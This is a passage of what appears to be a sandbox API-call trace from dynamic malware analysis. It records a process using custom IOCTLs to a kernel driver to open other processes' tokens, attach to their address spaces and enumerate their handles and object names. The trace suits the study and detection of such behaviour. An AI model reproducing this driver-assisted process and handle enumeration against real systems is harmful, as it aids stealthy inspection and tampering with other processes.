dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.151] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.151] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x2d1b30, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0162.151] PsLookupProcessByProcessId (in: ProcessId=0x6c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0xc000000b [0162.151] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.151] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.151] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.151] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x2d1b30, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0162.151] PsLookupProcessByProcessId (in: ProcessId=0x6c8, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0xc000000b [0162.151] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.151] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.151] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xaf0) returned 0x0 [0162.151] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.152] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x2d1b30, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0162.152] PsLookupProcessByProcessId (in: ProcessId=0xaf0, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0xc000000b [0162.152] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.152] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.152] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.152] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x2d1b30, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0162.152] PsLookupProcessByProcessId (in: ProcessId=0xaf0, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0xc000000b [0162.152] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.152] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.152] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.152] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x2d1b30, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0162.152] PsLookupProcessByProcessId (in: ProcessId=0xaf0, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0xc000000b [0162.152] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.152] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.152] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.153] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x2d1b30, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0162.153] PsLookupProcessByProcessId (in: ProcessId=0xaf0, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0xc000000b [0162.153] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.153] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.153] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.153] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x2d1b30, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0162.153] PsLookupProcessByProcessId (in: ProcessId=0xaf0, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0xc000000b [0162.153] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.153] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.153] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.153] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x2d1b30, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0162.153] PsLookupProcessByProcessId (in: ProcessId=0xaf0, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0xc000000b [0162.153] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.153] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.154] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.154] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpOutBuffer=0x2d1b30, lpBytesReturned=0x12d450, lpOverlapped=0x0) returned 0 [0162.154] PsLookupProcessByProcessId (in: ProcessId=0xaf0, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0xc000000b [0162.154] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.154] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.154] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x620) returned 0xc8 [0162.154] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0162.154] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa80020764b0, HandleInformation=0x0) returned 0x0 [0162.154] ObOpenObjectByPointer (in: Object=0xfffffa80020764b0, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff8000087c) returned 0x0 [0162.154] ObfDereferenceObject (Object=0xfffffa80020764b0) returned 0x10 [0162.154] ZwOpenProcessToken (in: ProcessHandle=0xffffffff8000087c, DesiredAccess=0x8, TokenHandle=0xfffffa80024ccb80 | out: TokenHandle=0xfffffa80024ccb80*=0xc4) returned 0x0 [0162.154] ZwClose (Handle=0xffffffff8000087c) returned 0x0 [0162.155] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.155] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0162.155] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0162.755] CloseHandle (hObject=0xc4) returned 1 [0162.755] CloseHandle (hObject=0xc8) returned 1 [0162.755] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.755] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0162.755] PsLookupProcessByProcessId (in: ProcessId=0x620, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0162.755] PsAcquireProcessExitSynchronization () returned 0x0 [0162.755] KeStackAttachProcess (in: PROCESS=0xfffffa80020764b0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020764b0, ApcState=0xfffff880051635d0) [0162.755] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80025c6c30, HandleInformation=0x0) returned 0x0 [0162.757] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0162.757] PsReleaseProcessExitSynchronization () returned 0x2 [0162.757] ObfDereferenceObject (Object=0xfffffa80020764b0) returned 0xe [0162.757] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80022c4044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80022c4044, ReturnLength=0xfffff88005163508) returned 0x0 [0162.757] ObfDereferenceObject (Object=0xfffffa80025c6c30) returned 0x1 [0162.757] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.758] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.758] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.758] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0162.758] PsLookupProcessByProcessId (in: ProcessId=0x620, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0162.758] PsAcquireProcessExitSynchronization () returned 0x0 [0162.758] KeStackAttachProcess (in: PROCESS=0xfffffa80020764b0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020764b0, ApcState=0xfffff880051635d0) [0162.758] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80025c67d0, HandleInformation=0x0) returned 0x0 [0162.758] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0162.758] PsReleaseProcessExitSynchronization () returned 0x2 [0162.759] ObfDereferenceObject (Object=0xfffffa80020764b0) returned 0xe [0162.759] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80022e0044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80022e0044, ReturnLength=0xfffff88005163508) returned 0x0 [0162.759] ObfDereferenceObject (Object=0xfffffa80025c67d0) returned 0x1 [0162.759] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.759] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.759] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.759] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x2c, lpOverlapped=0x0) returned 1 [0162.759] PsLookupProcessByProcessId (in: ProcessId=0x620, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0162.760] PsAcquireProcessExitSynchronization () returned 0x0 [0162.760] KeStackAttachProcess (in: PROCESS=0xfffffa80020764b0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80020764b0, ApcState=0xfffff880051635d0) [0162.760] ObReferenceObjectByHandle (in: Handle=0x80, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa800254cf20, HandleInformation=0x0) returned 0x0 [0162.760] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0162.760] PsReleaseProcessExitSynchronization () returned 0x2 [0162.760] ObfDereferenceObject (Object=0xfffffa80020764b0) returned 0xe [0162.760] ObQueryNameString (in: Object=0xfffffa8007bffb50, ObjectNameInfo=0xfffffa80022e5044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80022e5044, ReturnLength=0xfffff88005163508) returned 0x0 [0162.760] ObfDereferenceObject (Object=0xfffffa800254cf20) returned 0x3 [0162.760] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.761] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9e0) returned 0xc8 [0162.761] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0162.761] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa80025d8b30, HandleInformation=0x0) returned 0x0 [0162.761] ObOpenObjectByPointer (in: Object=0xfffffa80025d8b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff800007c4) returned 0x0 [0162.761] ObfDereferenceObject (Object=0xfffffa80025d8b30) returned 0x10 [0162.761] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007c4, DesiredAccess=0x8, TokenHandle=0xfffffa80034f1d40 | out: TokenHandle=0xfffffa80034f1d40*=0xc4) returned 0x0 [0162.761] ZwClose (Handle=0xffffffff800007c4) returned 0x0 [0162.762] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.762] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0162.762] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0162.764] CloseHandle (hObject=0xc4) returned 1 [0162.765] CloseHandle (hObject=0xc8) returned 1 [0162.765] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.765] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0162.765] PsLookupProcessByProcessId (in: ProcessId=0x9e0, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0162.765] PsAcquireProcessExitSynchronization () returned 0x0 [0162.765] KeStackAttachProcess (in: PROCESS=0xfffffa80025d8b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80025d8b30, ApcState=0xfffff880051635d0) [0162.765] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80025d3560, HandleInformation=0x0) returned 0x0 [0162.765] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0162.765] PsReleaseProcessExitSynchronization () returned 0x2 [0162.765] ObfDereferenceObject (Object=0xfffffa80025d8b30) returned 0xe [0162.765] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80022b9044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80022b9044, ReturnLength=0xfffff88005163508) returned 0x0 [0162.765] ObfDereferenceObject (Object=0xfffffa80025d3560) returned 0x1 [0162.766] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.766] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.766] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.766] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0162.766] PsLookupProcessByProcessId (in: ProcessId=0x9e0, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0162.766] PsAcquireProcessExitSynchronization () returned 0x0 [0162.766] KeStackAttachProcess (in: PROCESS=0xfffffa80025d8b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80025d8b30, ApcState=0xfffff880051635d0) [0162.766] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80025d3410, HandleInformation=0x0) returned 0x0 [0162.766] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0162.766] PsReleaseProcessExitSynchronization () returned 0x2 [0162.767] ObfDereferenceObject (Object=0xfffffa80025d8b30) returned 0xe [0162.767] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80022ba044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80022ba044, ReturnLength=0xfffff88005163508) returned 0x0 [0162.767] ObfDereferenceObject (Object=0xfffffa80025d3410) returned 0x1 [0162.767] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.767] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.767] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xb20) returned 0xc8 [0162.767] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0162.767] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff88005163668, HandleInformation=0x0 | out: Object=0xfffff88005163668*=0xfffffa80025e4b30, HandleInformation=0x0) returned 0x0 [0162.767] ObOpenObjectByPointer (in: Object=0xfffffa80025e4b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff88005163670 | out: Handle=0xfffff88005163670*=0xffffffff800007c4) returned 0x0 [0162.767] ObfDereferenceObject (Object=0xfffffa80025e4b30) returned 0x1c [0162.767] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800007c4, DesiredAccess=0x8, TokenHandle=0xfffffa80034f1d40 | out: TokenHandle=0xfffffa80034f1d40*=0xc4) returned 0x0 [0162.768] ZwClose (Handle=0xffffffff800007c4) returned 0x0 [0162.768] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.768] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0162.768] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="5p5NrGJn0jS HALPmcxz", cchName=0x12d3c0, ReferencedDomainName="XDUWTFONO", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0162.771] CloseHandle (hObject=0xc4) returned 1 [0162.771] CloseHandle (hObject=0xc8) returned 1 [0162.771] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.771] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x48, lpOverlapped=0x0) returned 1 [0162.771] PsLookupProcessByProcessId (in: ProcessId=0xb20, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0162.771] PsAcquireProcessExitSynchronization () returned 0x0 [0162.771] KeStackAttachProcess (in: PROCESS=0xfffffa80025e4b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80025e4b30, ApcState=0xfffff880051635d0) [0162.771] ObReferenceObjectByHandle (in: Handle=0x10, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80025e5f20, HandleInformation=0x0) returned 0x0 [0162.771] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0162.772] PsReleaseProcessExitSynchronization () returned 0x2 [0162.772] ObfDereferenceObject (Object=0xfffffa80025e4b30) returned 0x1a [0162.772] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80022bb044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80022bb044, ReturnLength=0xfffff88005163508) returned 0x0 [0162.772] ObfDereferenceObject (Object=0xfffffa80025e5f20) returned 0x1 [0162.772] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.772] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.772] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.772] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0162.772] PsLookupProcessByProcessId (in: ProcessId=0xb20, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0162.772] PsAcquireProcessExitSynchronization () returned 0x0 [0162.772] KeStackAttachProcess (in: PROCESS=0xfffffa80025e4b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80025e4b30, ApcState=0xfffff880051635d0) [0162.772] ObReferenceObjectByHandle (in: Handle=0x1c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80025e5dd0, HandleInformation=0x0) returned 0x0 [0162.772] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0162.772] PsReleaseProcessExitSynchronization () returned 0x2 [0162.772] ObfDereferenceObject (Object=0xfffffa80025e4b30) returned 0x1a [0162.772] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80022df044, Length=0x800, ReturnLength=0xfffff88005163508 | out: ObjectNameInfo=0xfffffa80022df044, ReturnLength=0xfffff88005163508) returned 0x0 [0162.773] ObfDereferenceObject (Object=0xfffffa80025e5dd0) returned 0x1 [0162.773] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0162.773] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x2d1b30 | out: hHeap=0x290000) returned 1 [0162.773] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x2d1b30 [0162.773] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x2d1b30, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x2d1b30*, lpBytesReturned=0x12d450*=0x110, lpOverlapped=0x0) returned 1 [0162.773] PsLookupProcessByProcessId (in: ProcessId=0xb20, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0162.773] PsAcquireProcessExitSynchronization () returned 0x0 [0162.773] KeStackAttachProcess (in: PROCESS=0xfffffa80025e4b30, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80025e4b30, ApcState=0xfffff880051635d0) [0162.773] ObReferenceObjectByHandle (in: Handle=0x2c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffffa80025e1b60, HandleInformation=0x0) returned 0x0 [0162.773] 